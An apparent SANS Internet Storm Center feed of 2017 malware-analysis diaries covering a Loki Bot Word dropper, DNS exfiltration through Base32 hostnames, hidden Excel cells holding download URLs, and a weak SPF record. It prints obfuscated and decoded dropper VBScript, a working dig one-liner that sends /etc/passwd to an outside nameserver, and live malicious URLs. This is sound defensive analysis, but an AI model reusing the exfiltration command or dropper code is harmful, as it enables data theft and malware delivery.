Internet Storm Center News Feeds (RSS)

Mon, 24 Apr 2017 02:05:02 -0600

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Sun, 23 Apr 2017 20:04:40 -0600

This week I saw again a PDF containing a malicious Word document with macros (a downloader).

The PDF contains JavaScript that extracts the embedded Word document and launches Word. The user is prompted before this happens, but if you want to mitigate it, disable JavaScript in the PDF reader. With Adobe Reader version 15.009.20069 or later, the extracted Word document is marked with a mark-of-the-web regardless of whether the containing PDF is marked as such, so Word opens it in Protected View.

I made a video of the analysis of this document.

CVE-2017-0199

There has been a lot of talk about RTF documents exploiting CVE-2017-0199, making Word download and execute an HTML Application (HTA) without any user interaction (other than taking the document out of Protected View, if it carries a mark-of-the-web). And this without VBA macros (the RTF format does not support them).

After applying Microsoft's patch for CVE-2017-0199, a downloaded HTA is no longer executed, but it is still downloaded without user interaction. The attention that the RTF auto-update technique received (it was used to deliver the CVE-2017-0199 exploit) will certainly stimulate its use for other purposes, such as tracking who opens a document.

Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com


Sun, 23 Apr 2017 13:35:40 -0600


---------------
Jim Clausing, GIAC GSE #26
jclausing --at-- isc [dot] sans (dot) edu

I'll be teaching FOR610 in June, Sept, and Oct. See my schedule here: https://www.sans.org/instructors/jim-clausing


Fri, 21 Apr 2017 07:18:09 -0600

Thanks to our readers, we often get interesting samples to analyze. This time, Frederick sent us a malicious Microsoft Word document called Invoice_6083.doc (delivered in a zip archive). I had a quick look at it with viper:

```text
viper Invoice_6083.doc > virustotal -v
[+] VirusTotal Report for bc922d7335a58ae4269bfd652d62f03e:
[*] Detecting engines:
+----------------------+------------------------------+
| Antivirus            | Signature                    |
+----------------------+------------------------------+
| Ad-Aware             | Trojan.GenericKD.4881915     |
| AegisLab             | Troj.Ole2.Agent!c            |
| Arcabit              | Trojan.Generic.D4A7DFB       |
| Avast                | VBS:Agent-BRE [Trj]          |
| BitDefender          | Trojan.GenericKD.4881915     |
| Cyren                | Trojan.OGWQ-7                |
| ESET-NOD32           | VBS/Kryptik.FI               |
| Emsisoft             | Trojan.GenericKD.4881915 (B) |
| F-Secure             | Trojan.GenericKD.4881915     |
| Fortinet             | VBS/Kryptik.GA!tr            |
| GData                | Trojan.GenericKD.4881915     |
| Kaspersky            | HEUR:Trojan.OLE2.Agent.gen   |
| McAfee               | W97M/Downloader              |
| McAfee-GW-Edition    | W97M/Downloader              |
| MicroWorld-eScan     | Trojan.GenericKD.4881915     |
| NANO-Antivirus       | Trojan.Script.NJRat.dzzenc   |
| Qihoo-360            | virus.vbs.qexvmc.1           |
| Symantec             | Trojan.Mdropper              |
| TrendMicro           | TROJ_DROPPER.XXTWD           |
| TrendMicro-HouseCall | TROJ_DROPPER.XXTWD           |
| ZoneAlarm            | HEUR:Trojan.OLE2.Agent.gen   |
+----------------------+------------------------------+
[*] 21 out of 56 antivirus detected bc922d7335a58ae4269bfd652d62f03e as malicious.
[*] https://www.virustotal.com/file/d687ee9fe3b034dcd1e53fb37e2b26bc60e74ff505808b577f2c633d5549e422/analysis/1492633739/
```

A first behaviour is interesting: the document does not ask the user to enable macros when they are disabled (screenshot not reproduced).

Instead, a shell object is attached to a button labelled "Preview", clearly visible in the document (screenshot not reproduced).

The OLE object is listed in viper as ObjectPool/_1554011838/Ole10Native. Dumped, it contains an obfuscated VBScript:

```vbscript
gdtyaqiopndghdliosndgaqponvc = gdtyaqiopndghdliosndgaqponvc & dghdggaqiojdndgmnxlosjodpkdd("646174613D223839354332343138333343333333343432333334343234343033333434323434343234313438426438633165383032633165333165306264383862333438424538303343304331454431")
gdtyaqiopndghdliosndgaqponvc = gdtyaqiopndghdliosndgaqponvc & dghdggaqiojdndgmnxlosjodpkdd("4630424538384234343234313438393643323434303842453843314530303543314544343143303336433234333830334335384235434834643561393030303033303030303030303430303030303066666666303030306238303030303030303030303030303034303030303030303030303030303030303030303030303030")
gdtyaqiopndghdliosndgaqponvc = gdtyaqiopndghdliosndgaqponvc & dghdggaqiojdndgmnxlosjodpkdd("3030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030463030303030303030453146424130453030423430394344323142383031344343443231353436383639373332303730373236663637373236313664323036333631366536653666373432303632363532")
gdtyaqiopndghdliosndgaqponvc = gdtyaqiopndghdliosndgaqponvc & dghdggaqiojdndgmnxlosjodpkdd("3037323735364532303639364532303434344635333230364436463634363532453044304430413234303030303030303030303030303063636364373866653838616331366164383861633136616438384143313641443831443439354144383941433136414434424133344241443841414331364144384441303139414438")
gdtyaqiopndghdliosndgaqponvc = gdtyaqiopndghdliosndgaqponvc & dghdggaqiojdndgmnxlosjodpkdd("3941433136414433443332463341443842414331364144383841433136414438636163313661643831643438336164383961633136616438386163313761646337616331366164383164343835616439396163313661643364333266376164663361633136616433643332633861643839414331364144353236393633363838")
gdtyaqiopndghdliosndgaqponvc = gdtyaqiopndghdliosndgaqponvc & dghdggaqiojdndgmnxlosjodpkdd("3841433136414430303030303030303030303030303030353034353030303034433031303430303835303836433537303030303030303030303030303030304530303030333031304230313043303030303338303130303030413230383030303030303030303064653339303130303030313030303030303035303031303030")
gdtyaqiopndghdliosndgaqponvc = gdtyaqiopndghdliosndgaqponvc & dghdggaqiojdndgmnxlosjodpkdd("3030303430303030303130303030303030303230303030303530303031303030303030303030303035303030313030303030303030303030303230304130303030303430303030303030303030303030323030303038303030303031303030303031303030303030303030313030303030313030303030303030303030303031")
...(stuff deleted)...
gdtyaqiopndghdliosndgaqponvc = gdtyaqiopndghdliosndgaqponvc & dghdggaqiojdndgmnxlosjodpkdd("696E2E686578223A7069632E6E6F6465547970656456616C7565203D207374723A74656D70203D207069632E6E6F6465547970656456616C75653A77697468204372656174654F626A656374282241444F44422E53747265616D22293A2E74797065203D20313A2E6F70656E3A2E77726974652074656D703A2E73617665546F")
gdtyaqiopndghdliosndgaqponvc = gdtyaqiopndghdliosndgaqponvc & dghdggaqiojdndgmnxlosjodpkdd("46696C6520664E616D652C20323A2E636C6F73653A656E6420776974683A656E64207375623A736574207773203D204372656174654F626A6563742822575363726970742E5368656C6C22293A666E203D2077732E457870616E64456E7669726F6E6D656E74537472696E677328222574656D70252229202620225C746D702E")
gdtyaqiopndghdliosndgaqponvc = gdtyaqiopndghdliosndgaqponvc & dghdggaqiojdndgmnxlosjodpkdd("657865223A7361766546696C6520666E2C646174613A77732E52756E20666E3A777363726970742E736C65657020313030")
ExecuteGlobal gdtyaqiopndghdliosndgaqponvc

Function dghdggaqiojdndgmnxlosjodpkdd(gdtyaqiopndghdliosndgaqponvc)
  For y = 1 To Len(gdtyaqiopndghdliosndgaqponvc) Step 2
    ml = ml & ChrW(CLng("&H" & Mid(gdtyaqiopndghdliosndgaqponvc, y, 2)))
  Next
  dghdggaqiojdndgmnxlosjodpkdd = ml
End Function
```

The function dghdggaqiojdndgmnxlosjodpkdd walks the string two characters at a time and converts each pair from hex to a character. Everything is appended into one long string that is passed to ExecuteGlobal(). The decoded result:

```vbscript
data="..."   ' very long hex string (truncated here)
data=split(data,"H")(1)
sub saveFile(fName,str)
  dim temp
  set xmldoc = CreateObject("Microsoft.XMLDOM")
  xmldoc.loadXml "<?xml version=""1.0""?>"
  set pic = xmldoc.createElement("pic")
  pic.dataType = "bin.hex"
  pic.nodeTypedValue = str
  temp = pic.nodeTypedValue
  with CreateObject("ADODB.Stream")
    .type = 1
    .open
    .write temp
    .saveToFile fName, 2
    .close
  end with
end sub
set ws = CreateObject("WScript.Shell")
fn = ws.ExpandEnvironmentStrings("%temp%") & "\tmp.exe"
saveFile fn,data
ws.Run fn
wscript.sleep 100
```

The key is to split the string data on the character "H" and use the second element. Right after the "H" you can see the bytes 0x4D 0x5A ("MZ"), the start of the malicious payload. The "bin.hex" data type of the XML DOM element is simply a hex decoder; ADODB.Stream then writes the resulting bytes to %temp%\tmp.exe. The extracted executable was loaded into viper as Invoice_6083.exe (session output not reproduced).

It communicates with hxxp://account-verification.s3rv.me/vvv/Panel/five/fre.php (it's a Loki Bot, known to steal credentials from many applications and Bitcoin wallets from the infected computer).

To summarize, the malicious document:

  • Does not automatically execute the malicious code but asks the victim to launch it (double-clicking the "Preview" object)
  • Contains multiple layers of obfuscation
  • Drops a payload that is not downloaded from the Internet but stored (encoded) inside the script itself
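To make the two decoding layers concrete, here is an added Python example (not code from the diary or from the sample): the first function does what the macro's hex-pair decoder does, the second what split(data,"H")(1) plus the bin.hex/ADODB.Stream step does, and a third checks that the result really is a PE file. The obfuscated input is rebuilt around a constructed, headers-only fake executable, so nothing here is the real Loki Bot binary; the junk prefix is the one seen in the sample.

```python
"""Decode the two-layer encoding used by the Invoice_6083.doc script.

Added example, not code from the diary. Layer 1: the VBS string literals are
hex-encoded, two characters per byte, and turned back into text by the
macro's decoder function (ChrW(CLng("&H" & Mid(s, y, 2)))). Layer 2: the
resulting script holds a long string, splits it on the letter "H" and takes
the second element, a hex-encoded PE file written to disk via ADODB.Stream.
The payload below is a constructed, headers-only fake PE (assumption), not
the real dropped executable.
"""
import struct


def decode_hex_pairs(s: str) -> str:
    """Layer 1: what dghdggaqiojdndgmnxlosjodpkdd() does, two hex chars -> one char."""
    return "".join(chr(int(s[i:i + 2], 16)) for i in range(0, len(s), 2))


def extract_payload(script_text: str) -> bytes:
    """Layer 2: pull the data="..." literal, split on 'H', hex-decode element 1."""
    start = script_text.index('data="') + len('data="')
    end = script_text.index('"', start)
    blob = script_text[start:end]
    # Lower-case hex never contains 'H', so the junk prefix and the payload
    # are cleanly separated, exactly as split(data,"H")(1) does in VBScript.
    return bytes.fromhex(blob.split("H")[1])


def looks_like_pe(data: bytes) -> bool:
    """Cheap sanity check: MZ magic and e_lfanew pointing at a PE signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def build_fake_pe() -> bytes:
    """Constructed stand-in for the dropped executable (DOS header + PE signature only)."""
    dos = bytearray(b"MZ\x90\x00" + b"\x00" * 0x3C)   # 0x40 bytes
    struct.pack_into("<I", dos, 0x3C, 0x40)           # e_lfanew -> offset 0x40
    return bytes(dos) + b"PE\x00\x00" + b"\x4c\x01"   # signature + Machine = i386


def build_obfuscated_macro(payload: bytes) -> str:
    """Re-create both layers around `payload` so the decoders have input to work on."""
    junk = "895C241833C333442334424403344244424148"        # non-'H' junk, as in the sample
    stage2 = f'data="{junk}H{payload.hex()}"\ndata=split(data,"H")(1)\n'
    return stage2.encode("latin-1").hex().upper()             # layer 1, as in the VBS literals


if __name__ == "__main__":
    layer1 = build_obfuscated_macro(build_fake_pe())
    script = decode_hex_pairs(layer1)
    exe = extract_payload(script)
    print(script.splitlines()[1])
    print("PE header OK:", looks_like_pe(exe), "size:", len(exe))
```

The same two helpers work on the real sample: run decode_hex_pairs() over the concatenated hex literals to get the script, then extract_payload() on that text, and check the result with looks_like_pe() before doing anything else with it.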

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key


Thu, 20 Apr 2017 07:07:42 -0600

In many cases, DNS remains a goldmine for detecting potentially malicious activity. DNS can be abused in multiple ways to bypass security controls. DNS tunnelling is a common way to establish connections with remote systems; it is often based on TXT records carrying the encoded payload. TXT records are also used for legitimate purposes, such as publishing SPF records, but too many TXT queries could mean that something odd is happening on your network.

Instead of using TXT records, data exfiltration may occur directly via the FQDN (Fully Qualified Domain Name). RFC 1035[1] limits a name to 255 characters in total, with each label 63 characters or less. Base32 encoding[2] produces only A-Z and 2-7 (plus "=" padding at the very end), which fits the characters allowed in a hostname (letters, digits and "-"), so we can encode our data in strings compatible with the DNS requirements:

```sh
$ cat /etc/passwd | base32 -w 63 | while read L
do
  dig $L.data.rootshell.be @192.168.254.8
done
```

Note: the -w 63 parameter wraps the Base32 output every 63 characters, so each line fits in a single DNS label. On the name server, the query log shows the data flowing through:

```text
$ grep data.rootshell.be queries.log
20-Apr-2017 08:32:11.075 queries: info: client 172.x.x.x#44635: query: OJXW65B2PA5DAORQHJZG633UHIXXE33POQ5C6YTJNYXWEYLTNAFGIYLFNVXW4OT.data.rootshell.be IN A +E (192.168.254.8)
20-Apr-2017 08:32:11.113 queries: info: client 172.x.x.X#50081: query: YHIYTUMJ2MRQWK3LPNY5C65LTOIXXGYTJNY5C65LTOIXXGYTJNYXW433MN5TWS3.data.rootshell.be IN A +E (192.168.254.8)
20-Apr-2017 08:32:11.173 queries: info: client 172.x.x.x#40457: query: QKMJUW4OTYHIZDUMR2MJUW4ORPMJUW4ORPOVZXEL3TMJUW4L3ON5WG6Z3JNYFHG.data.rootshell.be IN A +E (192.168.254.8)
20-Apr-2017 08:32:11.222 queries: info: client 172.x.x.x#56897: query: 6LTHJ4DUMZ2GM5HG6LTHIXWIZLWHIXXK43SF5ZWE2LOF5XG63DPM5UW4CTTPFXG.data.rootshell.be IN A +E (192.168.254.8)
20-Apr-2017 08:32:11.276 queries: info: client 172.x.x.x#57339: query: GOTYHI2DUNRVGUZTIOTTPFXGGORPMJUW4ORPMJUW4L3TPFXGGCTHMFWWK4Z2PA5.data.rootshell.be IN A +E (192.168.254.8)
...
```

To decode this on the attacker side, extract the first label of each query and feed the concatenation to base32 -d:

```sh
$ grep data.rootshell.be queries.log | cut -d ' ' -f8 | cut -d . -f1 | base32 -d | more
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
...
```

We don't even need the name server's query log; the same queries are visible on the wire:

```sh
# tcpdump -vvv -s 0 -i eth0 -l -n port 53 | egrep 'A\? .*\.data\.rootshell\.be'
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
172.x.x.x.40335 > 192.168.254.8.53: [udp sum ok] 9843+ [1au] A? OJXW65B2PA5DAORQHJZG633UHIXXE33POQ5C6YTJNYXWEYLTNAFGIYLFNVXW4OT.data.rootshell.be. ar: . OPT UDPsize=4096 (110)
172.x.x.x.35770 > 192.168.254.8.53: [udp sum ok] 19877+ [1au] A? YHIYTUMJ2MRQWK3LPNY5C65LTOIXXGYTJNY5C65LTOIXXGYTJNYXW433MN5TWS3.data.rootshell.be. ar: . OPT UDPsize=4096 (110)
172.x.x.x.41463 > 192.168.254.8.53: [udp sum ok] 29267+ [1au] A? QKMJUW4OTYHIZDUMR2MJUW4ORPMJUW4ORPOVZXEL3TMJUW4L3ON5WG6Z3JNYFHG.data.rootshell.be. ar: . OPT UDPsize=4096 (110)
172.x.x.x.38048 > 192.168.254.8.53: [udp sum ok] 30042+ [1au] A? 6LTHJ4DUMZ2GM5HG6LTHIXWIZLWHIXXK43SF5ZWE2LOF5XG63DPM5UW4CTTPFXG.data.rootshell.be. ar: . OPT UDPsize=4096 (110)
...
```

As you can see, we just used standard DNS requests to exfiltrate data. To detect this, keep an eye on your DNS logs and particularly on the query length. [Graph of DNS query lengths, image not reproduced]

But, as usual, not all long DNS queries are suspicious. Some CDNs, for example, generate very long hostnames:

```text
hxxps://2ecffd01e1ab3e9383f0-07db7b9624bbdf022e3b5395236d5cf8.ssl.cf4.rackcdn.com/Product/178ee827-0671-4f17-b75b-2022963f5980.pdf
```

To reduce the risk of false positives, this control can be combined with others:

  • The volume of traffic per IP
  • The volume of traffic per (sub-)domain
  • White-lists
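The checks above, combined, as an added Python example (not a tool from the diary): it parses query-log lines in the BIND layout shown earlier, flags names whose leftmost label is long and made only of the Base32 alphabet, aggregates hits per client and parent zone so that one long CDN hostname does not alert but a burst under one zone does, and honours an allow-list. It also does the attacker-side reassembly (the diary's cut | base32 -d) so the two halves can be checked against each other. The log lines are constructed for the demo; the client 172.16.0.10, the resolver 192.0.2.53 and the allow-list entry are assumptions, while data.rootshell.be and the CDN hostname are the diary's.

```python
"""Spot Base32-in-FQDN exfiltration in BIND query logs and recover the data.

Added example, not part of the diary. Defender side: analyse() flags long
Base32-only leftmost labels and aggregates them per (client, parent zone),
with an allow-list for known long-hostname generators. Attacker side:
decode_exfil() reassembles the labels like `cut | base32 -d`. The log lines
are constructed (make_sample_log); client/resolver addresses are assumptions.
"""
import base64
import re
from collections import defaultdict

QUERY_RE = re.compile(
    r"client (?P<client>[\d.]+)#\d+: query: (?P<qname>\S+) IN (?P<qtype>\S+)"
)
BASE32_LABEL = re.compile(r"^[A-Z2-7]+$", re.IGNORECASE)
MIN_LABEL = 40        # assumption: shorter Base32-looking labels are too noisy to alert on
MAX_QNAME = 100       # assumption: RFC 1035 allows 255, normal traffic rarely gets near 100
ALLOWLIST = ("ssl.cf4.rackcdn.com",)   # assumed-benign long-hostname generators

SAMPLE_SECRET = (
    b"root:x:0:0:root:/root:/bin/bash\n"
    b"daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    b"bin:x:2:2:bin:/bin:/usr/sbin/nologin\n"
    b"sys:x:3:3:sys:/dev:/usr/sbin/nologin\n"
)


def parse_line(line):
    """Return (client, qname, qtype) for a BIND query-log line, else None."""
    m = QUERY_RE.search(line)
    if not m:
        return None
    return m.group("client"), m.group("qname").rstrip("."), m.group("qtype")


def parent_zone(qname, labels=3):
    """Aggregation key: the last `labels` labels (X.data.rootshell.be -> data.rootshell.be)."""
    return ".".join(qname.split(".")[-labels:])


def is_suspicious(qname):
    """Very long name, or a leftmost label that is pure Base32 and long enough to carry data."""
    if any(qname.endswith("." + a) for a in ALLOWLIST):
        return False
    first = qname.split(".")[0].rstrip("=")   # '=' padding may ride along on the last chunk
    if len(qname) > MAX_QNAME:
        return True
    return len(first) >= MIN_LABEL and bool(BASE32_LABEL.match(first))


def analyse(lines, min_hits=3):
    """Defender side: {(client, zone): count} for pairs with at least min_hits suspicious queries."""
    hits = defaultdict(int)
    for line in lines:
        parsed = parse_line(line)
        if parsed and is_suspicious(parsed[1]):
            hits[(parsed[0], parent_zone(parsed[1]))] += 1
    return {k: v for k, v in hits.items() if v >= min_hits}


def decode_exfil(lines, zone):
    """Attacker side: concatenate the leftmost labels sent to `zone` and Base32-decode them."""
    chunks = [p[1].split(".")[0] for p in map(parse_line, lines) if p and p[1].endswith("." + zone)]
    b32 = "".join(chunks)
    b32 += "=" * (-len(b32) % 8)   # restore the padding dropped from the labels
    return base64.b32decode(b32, casefold=True)


def make_sample_log():
    """Constructed log: the secret as 63-char Base32 labels plus two benign queries."""
    b32 = base64.b32encode(SAMPLE_SECRET).decode().rstrip("=")   # '=' is not a hostname character
    labels = [b32[i:i + 63] for i in range(0, len(b32), 63)]
    fmt = ("20-Apr-2017 08:32:11.{ms:03d} queries: info: client 172.16.0.10#{port}: "
           "query: {name} IN A +E (192.0.2.53)")
    lines = [fmt.format(ms=i, port=40000 + i, name=f"{label}.data.rootshell.be")
             for i, label in enumerate(labels)]
    lines.append(fmt.format(ms=99, port=41000, name="www.example.com"))
    lines.append(fmt.format(ms=100, port=41001,
                            name="2ecffd01e1ab3e9383f0-07db7b9624bbdf022e3b5395236d5cf8.ssl.cf4.rackcdn.com"))
    return lines


if __name__ == "__main__":
    log = make_sample_log()
    for (client, zone), n in analyse(log).items():
        print(f"{client} sent {n} suspicious queries under {zone}")
    print(decode_exfil(log, "data.rootshell.be").decode())
```

The thresholds are deliberately conservative: the per-zone count is what keeps a single odd-looking CDN name from paging anyone, and raising MIN_LABEL or min_hits trades detection latency for fewer false positives. Feed the real log through the same functions with your own allow-list.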

This technique is not new but regularly resurfaces. The malware used by the Wekby group[3], reported in 2016, already relied on DNS requests for C2 communications.

[1]https://www.ietf.org/rfc/rfc1035.txt
[2]https://en.wikipedia.org/wiki/Base32
[3]http://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key


Wed, 19 Apr 2017 05:47:56 -0600

Recently, I found a malicious Excel sheet which contained a VBA macro. One particularity of this file was that useful information was stored in cells. The VBA macro read and used them to download the malicious PE file. The Excel file looked classic, asking the user to enable macros:

But below, around the 1000th row, some cells were hidden:

Once expanded, they revealed interesting values:

The macro code used the content of those cells:

```vb
' presumably a renamed URLDownloadToFile declaration: (0, url, localPath, 0, 0)
yryrysdhahshdfkjfkslksdlkfllskjdflkjsdflslksdjkf = kjjhkhdskhsdhsdjvjsdffdjgjgsjdfsjdf(0, Sheets(1).Cells(1000, 2), "C:\Temp\" & Sheets(1).Cells(1001, 2), 0, 0)
kjhadkjhfkasjhdkfjhakjhfkasjhdf = Sheets(1).Cells(1004, 2)
sdlkjfgksjdfkjhdkjfgkjsfdhjghjdfgwscript = Sheets(1).Cells(1003, 2)
kjfdkkjgnknngndg = Sheets(1).Cells(1002, 2)
```

The rest of the macro was, as usual, to download the malicious PE file, to store it on the disk and to execute it. The PE file has a VT score of 10/60 [1]

This is not the first time that I have seen data passed to a macro this way. It's easy to run campaigns with many URLs and samples without touching the macro. I had a batch of 400 malicious Excel sheets to inspect, so to search for such hidden content I wrote a quick Python script[2] based on the xlrd[3] module. Yes, Python has a third-party module for almost any task! The goal is to detect two techniques used to hide data:

  • Hidden cells
  • Cells using the same colour for the text and the background

```text
$ ./hidden.py 1.xls | more
Number of sheets: 3
--- Processing sheet 0 (????1) ---
[    5/   8] Document created in earlier version of Microsoft Office Excel
[    7/   8] To view this content, please click Enable Editing form the yellow bar and then click Enable Content
[  999/   0] [H] Url
[  999/   1] [H] http://astrasunxc.top/read.php?f=chrome_update.exe
[ 1000/   0] [H] Name_file
[ 1000/   1] [H] myfile.exe
[ 1001/   1] [H] cript
[ 1002/   1] [H] .Shell
[ 1003/   1] [H] ws
--- Processing sheet 1 (????2) ---
[    0/   0] Company Name
[    0/   4] INVOICE
[    1/   0] [Street Address]
[    2/   0] [City, ST ZIP]
[    3/   0] Phone: [000-000-0000]
[    4/   0] Fax: [000-000-0000]
[    8/   0] BILL TO
[    9/   0] [Name]
[   10/   0] [Company Name]
[   11/   0] [Street Address]
[   12/   0] [City, ST ZIP]
[   13/   0] [Phone]
[   15/   0] DESCRIPTION
[   15/   4] TAXED
[   15/   5] AMOUNT
[   16/   0] [Service Fee]
[   16/   5] 230.0
[   17/   0] [Labor: 5 hours at $75/hr]
[   17/   5] 375.0
[   18/   0] [Parts]
[   18/   4] X
[   18/   5] 345.0
[   23/   3] [42]
[   23/   4] Subtotal
[   23/   5] 950.0
[   24/   4] Taxable
[   24/   5] 345.0
[   25/   0] OTHER COMMENTS
[   25/   4] Tax rate
[   25/   5] 0.0625
[   26/   0] 1. Total payment due in 30 days
[   26/   4] Tax due
[   26/   5] 21.56
[   27/   0] 2. Please include the invoice number on your check
[   27/   4] Other
[   28/   4] TOTAL
[   28/   5] 971.56
[   30/   4] Make all checks payable to
[   31/   4] [Your Company Name]
--- Processing sheet 2 (????3) ---
```

A lighter output, listing only the hidden cells, is available with the -q option:

```text
$ ./hidden.py -q 1.xls
Number of sheets: 3
--- Processing sheet 0 (????1) ---
[  999/   0] [H] Url
[  999/   1] [H] http://astrasunxc.top/read.php?f=chrome_update.exe
[ 1000/   0] [H] Name_file
[ 1000/   1] [H] myfile.exe
[ 1001/   1] [H] cript
[ 1002/   1] [H] .Shell
[ 1003/   1] [H] ws
```

Data hidden in cells is not limited to URLs and file names; a cell can also hold a complete PE file as a comma-separated list of decimal byte values:

```text
77,90,144,0,3,0,0,0,4,0,0,0,255,255,0,0,184,0,0,0,0,0,0,0,64,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,240,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111,103,114,97,109,32,99,97,110,110,111,116,32,
98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,13,10,36,0,0,0,0,0,0,0,240,105,109,3,180,8,3,80,180,8,3,80,
180,8,3,80,147,206,120,80,183,8,3,80,180,8,2,80,189,8,3,80,147,206,126,80,176,8,3,80,147,206,110,80,190,8,3,80,147,206,121,80,181,
8,3,80,147,206,127,80,181,8,3,80,147,206,123,80,181,8,3,80,82,105,99,104,180,8,3,80,82,105,99,104,51,0,145,193,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,80,69,0,0,76,1,4,0,21,150,213,85,0,0,0,0,0,0,0,0,224,0,3,1,11,1,0,1,0,64,1,0,0,192,0,0,0,0,0,0,80,169,
0,0,0,16,0,0,0,80,1,0,0,0,64,0,0,16,0,0,0,16,0,0,4,0,0,0,0,0,0,0,4,0,0,0,0,0,0,0,0,176,2,0,0,16,0,0,0,0,0,0,2,0,0,128,0,0,16,0,0,
16,0,0,0,0,16,0,0,16,0,0,0,0,0,0,16,0,0,0,176,208,1,0,70,0,0,0,244,194,1,0,44,1,0,0,0,16,2,0,52,152,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,136,194,1,0,64,0,0,0,0,0,0,0,0,0,0,0,0,80,1,
0,168,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,46,116,101,120,116,0,0,0,110,63,1,0,0,16,0,0,0,64,1,0,0,16,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,33,0,0,96,46,114,100,97,116,97,0,0,246,128,0,0,0,80,1,0,0,144,0,0,0,80,1,0,0,0,0,0,0,0,0,0,0,0,0,0,64,0,0,64,46,100,
97,116,97,0,0,0,196,34,0,0,0,224,1,0,0,16,0,0,0,224,1,0,0,0,0,0,0,0,0,0,0,0,0,0,64,0,0,192,46,114,115,114,99, ...
```

As you can see, it starts with 77 and 90, the decimal values of the letters "M" and "Z": the cell holds a complete executable. A few lines of Python rebuild the file (the byte list is truncated here):

```python
# Rebuild the PE file from the comma-separated decimal bytes stored in the cell
buffer = "77,90,144,..."   # the full list copied from the cell
with open("sample.exe", "wb") as f:
    for c in buffer.split(","):
        f.write(bytes([int(c)]))
```

Viper's Excel module[4] gives the same view of the hidden cells directly from a session:

```text
viper > find name 1.xls
+---+-------+--------------------------+----------------------------------+------------------------+
| # | Name  | Mime                     | MD5                              | Tags                   |
+---+-------+--------------------------+----------------------------------+------------------------+
| 1 | 1.xls | application/vnd.ms-excel | e6190b79db7b32e9a34bc4ee473209c8 | spam, embedded_win_api |
+---+-------+--------------------------+----------------------------------+------------------------+
viper > open -l 1
[*] Session opened on /home/nonroot/.viper/binaries/5/2/c/f/52cf6415c7763bede4af3cfc6543a4557d6ff5cb9fd02b5ed239352f005a8c39
viper 1.xls > excel
[*] Sheet 0
+------+-----+--------+----------------------------------------------------------------------------------------------------+
| Row  | Col | Status | Value                                                                                              |
+------+-----+--------+----------------------------------------------------------------------------------------------------+
| 5    | 8   |        | Document created in earlier version of Microsoft Office Excel                                      |
| 7    | 8   |        | To view this content, please click Enable Editing form the yellow bar and then click Enable Content |
| 999  | 0   | Hidden | Url                                                                                                |
| 999  | 1   | Hidden | http://astrasunxc.top/read.php?f=chrome_update.exe                                                 |
| 1000 | 0   | Hidden | Name_file                                                                                          |
| 1000 | 1   | Hidden | myfile.exe                                                                                         |
| 1001 | 1   | Hidden | cript                                                                                              |
| 1002 | 1   | Hidden | .Shell                                                                                             |
| 1003 | 1   | Hidden | ws                                                                                                 |
+------+-----+--------+----------------------------------------------------------------------------------------------------+
[*] Sheet 1
+-----+-----+--------+----------------------------------------------------+
| Row | Col | Status | Value                                              |
+-----+-----+--------+----------------------------------------------------+
...
```

As you can see, bad guys also store data in the document itself and read it from the VBA code. I have also seen white text on a white background used the same way in Word documents a few times. Happy hunting!

[1]https://www.virustotal.com/file/3626729fe8a77f74f4f6da58d5fb474d9c774dff3494063c5f8b4fc50f908585/analysis/1491843226/
[2]https://github.com/xme/toolbox/blob/master/xls_hidden.py
[3]https://github.com/python-excel/xlrd
[4]https://github.com/xme/toolbox/blob/master/excel.py

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key


Tue, 18 Apr 2017 16:14:32 -0600

Our reader Charlie forwarded us a somewhat interesting Apple phish. Apple is a big phishing target, and the phish itself wasn't all that special. It does a reasonably good job of emulating real Apple e-mails, but what is more interesting are the From address and the link (screenshot not reproduced).

The From address was set to apple.ssl.com. For the uninitiated, this may look like a valid Apple domain. Instead, it is a subdomain of ssl.com, and SSL.com is of course not a legitimate source of Apple e-mail. But why did this e-mail make it past SPF filters? ssl.com does define an SPF record:

v=spf1 ip4:144.76.245.218 ip4:199.102.137.146 include:amazonses.com include:mailanyone.net include:fusemail.net ~all

The record contains a common weakness: the ~ in front of the final all means "softfail". A softfail tells the receiver to accept the message and at most mark it as suspicious, so it does not block a spoofed sender. There is also no DMARC record for the domain, so nothing requires the From: header to align with the domain that SPF actually authenticated (SPF is evaluated on the envelope sender, and a subdomain does not inherit its parent's record). The ~ is often used to avoid false positives, for example when a company is not sure it has listed every server sending mail on its behalf. That may be reasonable initially, but it should be replaced with -all once the record is complete.
